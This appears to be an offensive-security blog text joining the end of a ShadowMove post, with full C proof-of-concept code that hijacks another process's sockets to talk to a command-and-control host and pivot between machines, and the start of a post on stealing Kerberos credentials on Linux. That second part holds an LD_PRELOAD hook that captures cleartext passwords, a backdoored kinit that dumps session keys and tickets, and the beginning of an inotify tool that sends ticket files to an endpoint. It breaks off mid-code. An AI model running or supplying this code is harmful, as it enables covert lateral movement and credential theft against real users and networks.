POBJECT_NAME_INFORMATION objectNameInfo;
// Duplicate handle
NtDuplicateObject(hProc, (HANDLE)handle.Handle, GetCurrentProcess(), &dupHandle, PROCESS_ALL_ACCESS, FALSE, DUPLICATE_SAME_ACCESS);
objectNameInfo = (POBJECT_NAME_INFORMATION)malloc(0x1000);
// Get handle info
NtQueryObject(dupHandle, ObjectNameInformation, objectNameInfo, 0x1000, &returnLength);
// Narrow the search checking if the name length is correct (len(\Device\Afd) == 11 * 2)
if (objectNameInfo->Name.Length == 22) {
printf("[-] Testing %d of %d\n", i, handleInfo->HandleCount);
// Check if it ends in "Afd"
LPWSTR needle = (LPWSTR)malloc(8);
memcpy(needle, objectNameInfo->Name.Buffer + 8, 6);
if (needle[0] == 'A' && needle[1] == 'f' && needle[2] == 'd') {
// We got a candidate
printf("\t[*] \\Device\\Afd found at %d!\n", i);
// Try to duplicate the socket
status = WSADuplicateSocketW((SOCKET)dupHandle, GetCurrentProcessId(), &wsaProtocolInfo);
if (status != 0) {
printf("\t\t[X] Error duplicating socket!\n");
free(needle);
free(objectNameInfo);
CloseHandle(dupHandle);
continue;
}
// We got it?
targetSocket = WSASocket(wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, &wsaProtocolInfo, 0, WSA_FLAG_OVERLAPPED);
if (targetSocket != INVALID_SOCKET) {
struct sockaddr_in sockaddr;
DWORD len;
len = sizeof(SOCKADDR_IN);
// Is this the socket?
if (getpeername(targetSocket, (SOCKADDR*)&sockaddr, &len) == 0) {
if (strcmp(inet_ntoa(sockaddr.sin_addr), dstIP) == 0) {
printf("\t[*] Duplicated socket (%s)\n", inet_ntoa(sockaddr.sin_addr));
free(needle);
free(objectNameInfo);
return targetSocket;
}
}
}
free(needle);
}
}
free(objectNameInfo);
}
}
return 0;
}
int main(int argc, char** argv) {
WORD wVersionRequested;
WSADATA wsaData;
DWORD dwProcessId;
LPSTR dstIP = NULL;
SOCKET targetSocket;
char buff[255] = { 0 };
printf("\t\t\t-=[ ShadowMove Gateway PoC ]=-\n\n");
// smgateway.exe [PID] [IP dst]
/* It's just a PoC, we do not validate the args. But at least check if number of args is right X) */
if (argc != 3) {
printf("[!] Error: syntax is %s [PID] [IP dst]\n", argv[0]);
exit(-1);
}
dwProcessId = strtoul(argv[1], NULL, 10);
dstIP = (LPSTR)malloc(strlen(argv[2]) + 1); // room for the terminating NUL
memcpy(dstIP, argv[2], strlen(argv[2]) + 1); // copy the string including its NUL
// Classic
wVersionRequested = MAKEWORD(2, 2);
WSAStartup(wVersionRequested, &wsaData);
targetSocket = findTargetSocket(dwProcessId, dstIP);
send(targetSocket, "Hello From the other side!\n", strlen("Hello From the other side!\n"), 0);
recv(targetSocket, buff, 255, 0);
printf("\n[*] Message from outside:\n\n %s\n", buff);
return 0;
}
Here we just send the message “Hello from the other side!” from our infected machine to the “C&C” and the message “Stay hydrated!” comes from the C&C to the infected machine.
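The PoC only checks the number of arguments. A minimal sketch of validating their content could look like the code below; parse_pid and is_ipv4 are hypothetical helper names, and the includes assume a POSIX system (on Windows, inet_pton is declared in ws2tcpip.h instead).

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Parses a decimal PID. Returns 1 and stores the value on success, 0 otherwise. */
int parse_pid(const char *text, unsigned long *pid)
{
    char *end = NULL;
    unsigned long value;

    assert(text != NULL && pid != NULL);
    if (text[0] < '0' || text[0] > '9')
        return 0;                       /* rejects "", signs and leading spaces */
    errno = 0;
    value = strtoul(text, &end, 10);
    if (errno != 0 || *end != '\0')
        return 0;                       /* overflow or trailing garbage */
    *pid = value;
    return 1;
}

/* Returns 1 when text is a well-formed dotted-quad IPv4 address, 0 otherwise. */
int is_ipv4(const char *text)
{
    struct in_addr addr;

    assert(text != NULL);
    return inet_pton(AF_INET, text, &addr) == 1;
}
```

Rejecting malformed input early also matters here because the IP string is later compared with strcmp against the output of inet_ntoa, so anything that is not a canonical dotted quad would never match.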
We just saw how we can use ShadowMove to turn a program into a proxy for our local implant. But this same approach can be used to connect two machines. Imagine a scenario where we have 3 machines: A <--> B <--> C. If we want to reach services exposed by C from A, we have to forward traffic in B (either with netsh or by dropping a proxy). We can achieve this with ShadowMove too.
We only need to execute two legitimate programs in B: one that connects to an exposed port in A and another to the target service in C. Then we hijack both sockets and bridge them.
Note: imagine we want to execute ldapsearch from A and the Domain Controller is at C. In A we need a script that exposes two ports, one to receive the connection from ldapsearch (A’) and another to receive the connection from B (A’’). Everything received in A’ is sent to A’’ (which is connected to B), and then our bridge forwards everything to the connection between B and C.
The code executed in B is almost the same as the one we used before:
// PoC of ShadowMove Pivot by Juan Manuel Fernández (@TheXC3LL)
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <winsock2.h>
#include <Windows.h>
#include <stdio.h>
#pragma comment(lib,"WS2_32")
// Most of the code is adapted from https://github.com/Zer0Mem0ry/WindowsNT-Handle-Scanner/blob/master/FindHandles/main.cpp
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectNameInformation 1
#define MSG_END_OF_TRANSMISSION "\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
#define BUFSIZE 65536
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
typedef NTSTATUS(NTAPI* _NtQueryObject)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef enum _POOL_TYPE
{
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
typedef struct _OBJECT_NAME_INFORMATION
{
UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName)
{
return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}
SOCKET findTargetSocket(DWORD dwProcessId, LPSTR dstIP) {
HANDLE hProc;
PSYSTEM_HANDLE_INFORMATION handleInfo;
DWORD handleInfoSize = 0x10000;
NTSTATUS status;
DWORD returnLength;
WSAPROTOCOL_INFOW wsaProtocolInfo = { 0 };
SOCKET targetSocket;
// Open target process with PROCESS_DUP_HANDLE rights
hProc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);
if (!hProc) {
printf("[!] Error: could not open the process!\n");
exit(-1);
}
printf("[+] Handle to process obtained!\n");
// Find the functions
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetLibraryProcAddress("ntdll.dll", "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetLibraryProcAddress("ntdll.dll", "NtDuplicateObject");
_NtQueryObject NtQueryObject = (_NtQueryObject)GetLibraryProcAddress("ntdll.dll", "NtQueryObject");
// Retrieve handles from the target process
handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
printf("[+] Found [%d] handlers in PID %d\n============================\n", handleInfo->HandleCount, dwProcessId);
// Iterate
for (DWORD i = 0; i < handleInfo->HandleCount; i++) {
// Check if it is the desired type of handle
if (handleInfo->Handles[i].ObjectTypeNumber == 0x24) {
SYSTEM_HANDLE handle = handleInfo->Handles[i];
HANDLE dupHandle = NULL;
POBJECT_NAME_INFORMATION objectNameInfo;
// Duplicate handle
NtDuplicateObject(hProc, (HANDLE)handle.Handle, GetCurrentProcess(), &dupHandle, PROCESS_ALL_ACCESS, FALSE, DUPLICATE_SAME_ACCESS);
objectNameInfo = (POBJECT_NAME_INFORMATION)malloc(0x1000);
// Get handle info
NtQueryObject(dupHandle, ObjectNameInformation, objectNameInfo, 0x1000, &returnLength);
// Narrow the search checking if the name length is correct (len(\Device\Afd) == 11 * 2)
if (objectNameInfo->Name.Length == 22) {
printf("[-] Testing %d of %d\n", i, handleInfo->HandleCount);
// Check if it ends in "Afd"
LPWSTR needle = (LPWSTR)malloc(8);
memcpy(needle, objectNameInfo->Name.Buffer + 8, 6);
if (needle[0] == 'A' && needle[1] == 'f' && needle[2] == 'd') {
// We got a candidate
printf("\t[*] \\Device\\Afd found at %d!\n", i);
// Try to duplicate the socket
status = WSADuplicateSocketW((SOCKET)dupHandle, GetCurrentProcessId(), &wsaProtocolInfo);
if (status != 0) {
printf("\t\t[X] Error duplicating socket!\n");
free(needle);
free(objectNameInfo);
CloseHandle(dupHandle);
continue;
}
// We got it?
targetSocket = WSASocket(wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, &wsaProtocolInfo, 0, WSA_FLAG_OVERLAPPED);
if (targetSocket != INVALID_SOCKET) {
struct sockaddr_in sockaddr;
DWORD len;
len = sizeof(SOCKADDR_IN);
// Is this the socket?
if (getpeername(targetSocket, (SOCKADDR*)&sockaddr, &len) == 0) {
if (strcmp(inet_ntoa(sockaddr.sin_addr), dstIP) == 0) {
printf("\t[*] Duplicated socket (%s)\n", inet_ntoa(sockaddr.sin_addr));
free(needle);
free(objectNameInfo);
return targetSocket;
}
}
}
free(needle);
}
}
free(objectNameInfo);
}
}
return 0;
}
// Reused from MSSQLPROXY https://github.com/blackarrowsec/mssqlproxy/blob/master/reciclador/reciclador.cpp
void bridge(SOCKET fd0, SOCKET fd1)
{
int maxfd, ret;
fd_set rd_set;
int nread; // recv() returns int; an unsigned type would hide the -1 error value
char buffer_r[BUFSIZE];
maxfd = (fd0 > fd1) ? fd0 : fd1;
while (1) {
FD_ZERO(&rd_set);
FD_SET(fd0, &rd_set);
FD_SET(fd1, &rd_set);
ret = select(maxfd + 1, &rd_set, NULL, NULL, NULL);
if (ret < 0 && errno == EINTR) {
continue;
}
if (FD_ISSET(fd0, &rd_set)) {
nread = recv(fd0, buffer_r, BUFSIZE, 0);
if (nread <= 0)
break;
send(fd1, buffer_r, nread, 0);
}
if (FD_ISSET(fd1, &rd_set)) {
nread = recv(fd1, buffer_r, BUFSIZE, 0);
if (nread <= 0)
break;
// End of transmission
if (nread >= strlen(MSG_END_OF_TRANSMISSION) && strstr(buffer_r, MSG_END_OF_TRANSMISSION) != NULL) {
send(fd0, buffer_r, nread - strlen(MSG_END_OF_TRANSMISSION), 0);
break;
}
send(fd0, buffer_r, nread, 0);
}
}
}
int main(int argc, char** argv) {
WORD wVersionRequested;
WSADATA wsaData;
DWORD dwProcessIdSrc;
DWORD dwProcessIdDst;
LPSTR dstIP = NULL;
LPSTR srcIP = NULL;
SOCKET srcSocket;
SOCKET dstSocket;
printf("\t\t\t-=[ ShadowMove Pivot PoC ]=-\n\n");
// smpivot.exe [PID src] [PID dst] [IP dst] [IP src]
/* It's just a PoC, we do not validate the args. But at least check if number of args is right X) */
if (argc != 5) {
printf("[!] Error: syntax is %s [PID src] [PID dst] [IP dst] [IP src]\n", argv[0]);
exit(-1);
}
dwProcessIdSrc = strtoul(argv[1], NULL, 10);
dwProcessIdDst = strtoul(argv[2], NULL, 10);
dstIP = (LPSTR)malloc(strlen(argv[3]) + 1); // room for the terminating NUL
memcpy(dstIP, argv[3], strlen(argv[3]) + 1);
srcIP = (LPSTR)malloc(strlen(argv[4]) + 1);
memcpy(srcIP, argv[4], strlen(argv[4]) + 1);
// Classic
wVersionRequested = MAKEWORD(2, 2);
WSAStartup(wVersionRequested, &wsaData);
srcSocket = findTargetSocket(dwProcessIdSrc, srcIP);
dstSocket = findTargetSocket(dwProcessIdDst, dstIP);
if (srcSocket == 0) {
printf("\n[!] Error: could not attach to source socket");
return -1;
}
printf("\n[<] Attached to SOURCE\n");
if (dstSocket == 0) {
printf("\n[!] Error: could not attach to sink socket");
return -1;
}
printf("[>] Attached to SINK\n");
printf("============================\n[Link up]\n============================\n");
bridge(srcSocket, dstSocket);
printf("============================\n[Link down]\n============================\n");
return 0;
}
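One detail of bridge() deserves a note: the buffer filled by recv() is not NUL-terminated and may contain zero bytes, so looking for the end-of-transmission marker with strstr() is fragile. A binary-safe alternative is to compare only the tail of the received data. This is a sketch under that assumption; strip_trailing_marker is a hypothetical helper, not part of the original PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Returns the payload length once a trailing marker has been removed.
   When the buffer does not end with the marker, n is returned unchanged. */
size_t strip_trailing_marker(const char *buf, size_t n,
                             const char *marker, size_t marker_len)
{
    assert(buf != NULL && marker != NULL);
    if (marker_len == 0 || n < marker_len)
        return n;                                  /* too short to hold the marker */
    if (memcmp(buf + n - marker_len, marker, marker_len) == 0)
        return n - marker_len;                     /* marker found at the very end */
    return n;
}
```

A caller would forward the returned number of bytes and stop relaying whenever the result is smaller than the number of bytes received.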
We can test it by connecting two listening netcats: one on 10.0.2.2 and the other on 10.0.2.15.
-=[ ShadowMove Pivot PoC ]=-
[+] Handle to process obtained!
[+] Found [66919] handlers in PID 5364
============================
[-] Testing 3779 of 66919
[-] Testing 10254 of 66919
[*] \Device\Afd found at 10254!
[*] Duplicated socket (10.0.2.15)
[+] Handle to process obtained!
[+] Found [67202] handlers in PID 7596
============================
[-] Testing 3767 of 67202
[-] Testing 10240 of 67202
[*] \Device\Afd found at 10240!
[*] Duplicated socket (10.0.2.2)
[<] Attached to SOURCE
[>] Attached to SINK
============================
[Link up]
============================
In one of our ends:
psyconauta@insulanova:~/Research/shadowmove|⇒ nc -lvp 8081
Listening on [0.0.0.0] (family 0, port 8081)
Connection from localhost 59596 received!
Hello from 10.0.2.15!
This is me from 10.0.2.2!
Here we summarize the problems:
Racing with the devil. We are playing with a duplicated socket, so the original program keeps reading from it. This means that some bytes can be lost if they are read by the program instead of us, but this can be solved easily by implementing a custom protocol that takes care of missing packets.
Timeouts. If the connection is closed by a timeout before we hijack it, we cannot reuse the socket.
Old handles. Depending on the program in use, we are likely to find old handles that meet our criteria (getpeername returns the target IP but the handle cannot be used). This could happen if the first connection attempt was unsuccessful. To solve this, just improve the detection method ;)
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is a compendium of well-known techniques used in GNU/Linux to steal kerberos credentials during post-exploitation stages. Please, take a seat and listen to the story.
The techniques discussed in this article are based on the paper Kerberos Credential Thievery (GNU/Linux) (2017). The approach of using inotify to steal ccache files, the injection into processes to extract tickets from the kernel keyring, and the usage of LD_PRELOAD have been used by us in real engagements. The rest have only been tested in lab environments.
The first approach that we are going to focus on is the usage of LD_PRELOAD to hook functions related to kerberos, so we can deploy a custom shared object designed to steal plaintext credentials from programs that use kerberos authentication.
We can trace kinit to locate which functions are likely to handle such information:
➜ working$ ltrace kinit [email protected]
setlocale(LC_ALL, "") = "en_US.UTF-8"
strrchr("kinit", '/') = nil
fileno(0x7fd428706a00) = 0
isatty(0) = 1
fileno(0x7fd428707760) = 1
isatty(1) = 1
fileno(0x7fd428707680) = 2
isatty(2) = 1
set_com_err_hook(0x564277f1d4b0, 0, 0, 0) = 0x7fd42870db30
getopt_long(2, 0x7ffd392b9318, "r:fpFPn54aAVl:s:c:kit:T:RS:vX:CE"..., 0x7ffd392b9090, nil) = -1
krb5_init_context(0x7ffd392b8f50, 0, 1, 0) = 0
krb5_cc_default(0x5642792154a0, 0x7ffd392b8f30, 1, 0) = 0
krb5_cc_get_type(0x5642792154a0, 0x5642792156c0, 0x7fd428bdea40, 0) = 0x7fd4289bf254
krb5_cc_get_principal(0x5642792154a0, 0x5642792156c0, 0x7ffd392b8f38, 0) = 0
krb5_parse_name_flags(0x5642792154a0, 0x7ffd392bb329, 0, 0x7ffd392b8f68) = 0
krb5_cc_support_switch(0x5642792154a0, 0x7fd4289bf254, 0x7ffd392bb344, 13) = 0
krb5_unparse_name(0x5642792154a0, 0x564279216d70, 0x7ffd392b8f70, 0) = 0
krb5_free_principal(0x5642792154a0, 0x564279216ce0, 0, 0) = 0
krb5_get_init_creds_opt_alloc(0x5642792154a0, 0x7ffd392b8f40, 0x564279214010, 0) = 0
krb5_get_init_creds_opt_set_out_ccache(0x5642792154a0, 0x564279216e30, 0x5642792156c0, 0x564279216e80) = 0
krb5_get_init_creds_password(0x5642792154a0, 0x7ffd392b8f80, 0x564279216d70, 0 <unfinished ...>
krb5_get_prompt_types(0x5642792154a0, 0x7ffd392b8f30, 0, 0) = 0x7ffd392b6ec4
krb5_prompter_posix(0x5642792154a0, 0x7ffd392b8f30, 0, 0Password for [email protected]:
) = 0
<... krb5_get_init_creds_password resumed> ) = 0
kadm5_destroy(0, 0, 0, 3) = 0x29c251f
krb5_get_init_creds_opt_free(0x5642792154a0, 0x564279216e30, 0, 3) = 0
krb5_free_cred_contents(0x5642792154a0, 0x7ffd392b8f80, 0x564279214010, 3) = 0
krb5_free_unparsed_name(0x5642792154a0, 0x564279216e00, 0x7fd428706ca0, 464) = 0
krb5_free_principal(0x5642792154a0, 0x564279216d70, 0x56427921c3d0, 1) = 0
krb5_cc_close(0x5642792154a0, 0x5642792156c0, 0x564279216df0, 1) = 0
krb5_free_context(0x5642792154a0, 0, 0x564279215c10, 0) = 0
+++ exited (status 0) +++
The functions krb5_get_init_creds_password and krb5_prompter_posix look interesting. The first is defined as:
krb5_error_code KRB5_CALLCONV
krb5_get_init_creds_password(krb5_context context,
krb5_creds *creds,
krb5_principal client,
const char *password,
krb5_prompter_fct prompter,
void *data,
krb5_deltat start_time,
const char *in_tkt_service,
krb5_get_init_creds_opt *options)
As we can see, this function has an argument “password” that is a pointer to a string, but as the documentation states this value can be null (in which case a prompt is shown, as kinit does). This function also uses a pointer to a krb5_creds struct that is defined as:
typedef struct _krb5_creds {
krb5_magic magic;
krb5_principal client; /**< client's principal identifier */
krb5_principal server; /**< server's principal identifier */
krb5_keyblock keyblock; /**< session encryption key info */
krb5_ticket_times times; /**< lifetime info */
krb5_boolean is_skey; /**< true if ticket is encrypted in
another ticket's skey */
krb5_flags ticket_flags; /**< flags in ticket */
krb5_address **addresses; /**< addrs in ticket */
krb5_data ticket; /**< ticket string itself */
krb5_data second_ticket; /**< second ticket, if related to
ticket (via DUPLICATE-SKEY or
ENC-TKT-IN-SKEY) */
krb5_authdata **authdata; /**< authorization data */
} krb5_creds;
So we can get the username and (if set) the password used to authenticate. If the password is not provided, we need to check how the prompt is used. The function krb5_prompter_posix is defined as:
krb5_error_code KRB5_CALLCONV
krb5_prompter_posix(
krb5_context context,
void *data,
const char *name,
const char *banner,
int num_prompts,
krb5_prompt prompts[])
The source code is easy to understand:
int fd, i, scratchchar;
FILE *fp;
char *retp;
krb5_error_code errcode;
struct termios saveparm;
osiginfo osigint;
errcode = KRB5_LIBOS_CANTREADPWD;
if (name) {
fputs(name, stdout);
fputs("\n", stdout);
}
if (banner) {
fputs(banner, stdout);
fputs("\n", stdout);
}
/*
* Get a non-buffered stream on stdin.
*/
fp = NULL;
fd = dup(STDIN_FILENO);
if (fd < 0)
return KRB5_LIBOS_CANTREADPWD;
set_cloexec_fd(fd);
fp = fdopen(fd, "r");
if (fp == NULL)
goto cleanup;
if (setvbuf(fp, NULL, _IONBF, 0))
goto cleanup;
for (i = 0; i < num_prompts; i++) {
errcode = KRB5_LIBOS_CANTREADPWD;
/* fgets() takes int, but krb5_data.length is unsigned. */
if (prompts[i].reply->length > INT_MAX)
goto cleanup;
errcode = setup_tty(fp, prompts[i].hidden, &saveparm, &osigint);
if (errcode)
break;
/* put out the prompt */
(void)fputs(prompts[i].prompt, stdout);
(void)fputs(": ", stdout);
(void)fflush(stdout);
(void)memset(prompts[i].reply->data, 0, prompts[i].reply->length);
got_int = 0;
retp = fgets(prompts[i].reply->data, (int)prompts[i].reply->length,
fp);
if (prompts[i].hidden)
putchar('\n');
if (retp == NULL) {
if (got_int)
errcode = KRB5_LIBOS_PWDINTR;
else
errcode = KRB5_LIBOS_CANTREADPWD;
restore_tty(fp, &saveparm, &osigint);
break;
}
/* replace newline with null */
retp = strchr(prompts[i].reply->data, '\n');
if (retp != NULL)
*retp = '\0';
else {
/* flush rest of input line */
do {
scratchchar = getc(fp);
} while (scratchchar != EOF && scratchchar != '\n');
}
errcode = restore_tty(fp, &saveparm, &osigint);
if (errcode)
break;
prompts[i].reply->length = strlen(prompts[i].reply->data);
}
cleanup:
if (fp != NULL)
fclose(fp);
else if (fd >= 0)
close(fd);
return errcode;
}
As we can see, this function receives an array of prompts and then uses fgets() to read data from a duplicated STDIN, storing the password in the krb5_data field (reply) of each krb5_prompt structure. So we only need to hook this function too and check those structures after the original call returns to get the cleartext password.
Finally our hook is:
#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <krb5/krb5.h>
typedef krb5_error_code (*orig_ftype)(krb5_context context, krb5_creds * creds, krb5_principal client, const char * password, krb5_prompter_fct prompter, void * data, krb5_deltat start_time, const char * in_tkt_service, krb5_get_init_creds_opt * k5_gic_options);
typedef krb5_error_code KRB5_CALLCONV (*orig_ftype_2)(krb5_context context, void *data, const char *name, const char *banner, int num_prompts, krb5_prompt prompts[]);
krb5_error_code krb5_get_init_creds_password(krb5_context context, krb5_creds * creds, krb5_principal client, const char * password, krb5_prompter_fct prompter, void * data, krb5_deltat start_time, const char * in_tkt_service, krb5_get_init_creds_opt * k5_gic_options) {
krb5_error_code retval;
orig_ftype orig_krb5;
orig_krb5 = (orig_ftype)dlsym(RTLD_NEXT, "krb5_get_init_creds_password");
if (password != NULL) {
printf("[+] Password %s\n", password);
}
retval = orig_krb5(context, creds, client, password, prompter, data, start_time, in_tkt_service, k5_gic_options);
if (retval == 0) {
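printf("[+] Username: %.*s\n", (int)creds->client->data->length, creds->client->data->data); /* krb5_data is length-delimited, not guaranteed NUL-terminated */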
}
return retval;
}
krb5_error_code KRB5_CALLCONV krb5_prompter_posix(krb5_context context, void *data, const char *name, const char *banner, int num_prompts, krb5_prompt prompts[]) {
krb5_error_code retval;
orig_ftype_2 orig_krb5;
orig_krb5 = (orig_ftype_2)dlsym(RTLD_NEXT, "krb5_prompter_posix");
retval = orig_krb5(context, data, name, banner, num_prompts,prompts);
for (int i = 0; i < num_prompts; i++) {
if ((int)prompts[i].reply->length > 0) {
printf("[+] Password: %s\n", prompts[i].reply->data);
}
}
return retval;
}
Let’s check it:
➜ working$ LD_PRELOAD=/home/vagrant/working/hook_preload.so kinit [email protected]
Password for [email protected]:
[+] Password: MightyPassword.69
[+] Username: Administrador
Another option is to substitute a target binary (or a library) with one backdoored by us. This can be done by compiling a modified version or by patching the original. In our case we are going to patch a binary (kinit, for example) with a simple hook using the project GLORYhook, which uses LIEF, Capstone and Keystone under the hood to simplify the process.
To avoid repeating the same hook, this time we are going to patch kinit so that it prints the keyblock and ticket data after a successful authentication:
#define _GNU_SOURCE
#include <stdio.h>
#include <krb5/krb5.h>
#include <stdint.h> /* uintmax_t */
#include <string.h>
krb5_error_code gloryhook_krb5_get_init_creds_password(krb5_context context, krb5_creds * creds, krb5_principal client, const char * password, krb5_prompter_fct prompter, void * data, krb5_deltat start_time, const char * in_tkt_service, krb5_get_init_creds_opt * k5_gic_options) {
krb5_error_code retval;
retval = krb5_get_init_creds_password(context, creds, client, password, prompter, data, start_time, in_tkt_service, k5_gic_options);
if (retval == 0){
printf("[+] Keyblock (%08jx):\n", (uintmax_t)creds->keyblock.enctype);
for (int i = 0; i < creds->keyblock.length; i++) {
printf("%02X", (unsigned char)creds->keyblock.contents[i]);
}
printf("\n[+] Ticket:\n");
for (int i = 0; i < creds->ticket.length; i++) {
printf("%02X", (unsigned char)creds->ticket.data[i]);
}
}
return retval;
}
Just compile it using the instructions provided by GLORYhook in its readme and test it:
➜ working$ gcc -shared -zrelro -znow -fPIC hook-patch.c -o hook_patch.so
➜ working$ python3 GLORYHook/glory.py /usr/bin/kinit ./hook_patch.so -o ./kinit-backdoored
[+] Beginning merge!
[+] Injecting new PLT
[+] Extending GOT for new PLT
[+] Fixing injected PLT
[+] Injecting PLT relocations
[+] Done!
➜ working$ ./kinit-backdoored [email protected]
Password for [email protected]:
[+] Keyblock (00000012):
E8B9D14EDC610C496A2B0426DDDACFA9AA52501A5998A1F1AF44644FF7F117DC
[+] Ticket:
6182046F3082046BA003020105A10F1B0D4143554152494F2E4C4F43414CA2223020A003020102A11930171B066B72627467741B0D4143554152494F2E4C4F43414CA382042D30820429A003020112A103020102A282041B0482041736B5A6CD1C6341E2145C93715ACAED71B1226D277B441D0731D830B819BEB2CC7DCE596C07176095C94E311BA05D45BDD951503FF5B2C8A6601EF39AA9316C2D0EAAD279279F1C5EB82BD133B637E98E4E672F08E047A0DD4D72612D9349F90E62753DBB8054860D82E7FE023694A175923236E84D55F047FF25AB6C801B4A14BA0526BF14C15015EE15EB723C783170820335A7272E54279CA17E3C4C8AB6079BED4FC0D8238FAD3B1D0F9FAB0B0AEC7603010F056F8F2B9F96B6BC03A5B3918382646078F62017EC0D11C05EDDCE01F77A88458D9EA476CF8E002BEE4F3886C0294344D8AC0840151AECC7090223240F6E3C4287320F840ACEA4C61FF7BA02E01EF4E6D203C13DEA9BFF9FE9A9F60F918A70FB9202C6C9EA5098735CAD0D7FA089C5F6EF87470413F3BF939FBC57060A341D0640E17F4106B5CAF46BC1DBB418D5B083B885D9A146A54C455F5D8E929889092FE4E2636CBC6CBD8CA599617D478D0194904FFAC35E4663FF6BB551E558D21E137BEE5600DCBBCE939B5A09DC3301FBB234AFF83985DF819B9C105FF18564E5C5B94DDE9DE690FAA3E0A21392ABCAD17F9A6975898BD59D743FA715001ABDD1321BFA4F70B4997B7BCA573EBAD3D5F57DC35429D4B1CEB2F7577352385C8DAA19326CA240A7AB4F1230C22CC14581BF66C52565F26835D24CB63FCC6535590C4C06C01EF325B8DE8C77D5DF82309F13C2080C599A2C69889A1E743EEFC4A5119B1EE418DE3748A2CAF75C50EA7E9E966DD40088C6C85EE8BB24859C032AB417EBEA08FD79506EFC6B34B1E8D57979D9D4EBC9822A50C23D0C71D188DB3DEFC5CFC49D422488D4AA4E90865601B51A9752957BECDF2AA5C41B0FD8F6F27EEAF5CB8E09F2453025B5FDF05EF9D693E91EE5C9D62E93097EBDBAC498F9D7E7F1A0FA54B7C2D3F7925C0A0AD48E792FFF833981793880F9A0A87CF0D8758BF73E5BAD095F95673172BF8DBCFE89F7B806BC3DC976CB7DA360DF1058B962E8E8B71A1D1DB903EC53DE343EA787C234DB239FB2758E7E70C13CA08CED1F9AD3D4228BCC54D098899C8E20A4EC494996572EC510AF2C88A9B1718EA4FA74C91F1789433151AAD3C99AD4BB1E57E41A7C40595D073E9E417383E2CB98D2886A643DE5A54270137D84DD510C6ED687D47462E9E03E559A0D5CFD44855308EE6A32F096A1FF04FBBE556945E667D7F3E3EC8ED6D30CD7BCE6A617ADDA5216D296E6F627D8EFDDECF392872E081020D7255D6AE604BD76A281CE1D7B38BA
39F5C6D6C9317F4B1E01D56C90D4D0EA5425BD8C7A3391EB682B087C6A4FA9A586515338322D27A396F65E69681DD2A4E4EA73B163A756A709232F4C6C56515E06AD4CC4F96B391F848DBAB73810AC3AC10D8FD7ACCA32A8D68F7DC2CF01A285E78F2F770CD322A2EF790A5A69EC91786D5180BFF1B76E6112BA008EFF0B7D7F2C01217AB57EE37D0BB082%
The most common way to store Kerberos tickets in Linux environments is with ccache files. By default the ccache files live in /tmp with a name like krb5cc_%UID% and they can be used directly by most tools based on the Impacket framework, so we can read the file contents to move laterally (or even to escalate privileges if we are lucky enough to get a TGT from a privileged user) and execute commands via psexec.py/smbexec.py/etc. But if no valid tickets are found (their lifetime is relatively short) we can wait and set an inotify watcher to detect every newly generated ticket and forward it to our C&C via https/dns/any-covert-channel.
// Example based on https://www.lynxbee.com/c-program-to-monitor-and-notify-changes-in-a-directory-file-using-inotify/
// Originally this code was posted by our owl @TheXC3LL at his own blog (https://x-c3ll.github.io/posts/rethinking-inotify/)
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <limits.h>
#include <unistd.h>
#include <fcntl.h>
#include <curl/curl.h>
#define MAX_EVENTS 1024 /*Max. number of events to process at one go*/
#define LEN_NAME 1024 /*Assuming length of the filename won't exceed 1024 bytes*/
#define EVENT_SIZE ( sizeof (struct inotify_event) ) /*size of one event*/
#define BUF_LEN ( MAX_EVENTS * ( EVENT_SIZE + LEN_NAME ) ) /*buffer to store the data of events*/
#define endpoint "http://localhost:4444"
int exfiltrate(char* filename) {
CURL *curl;
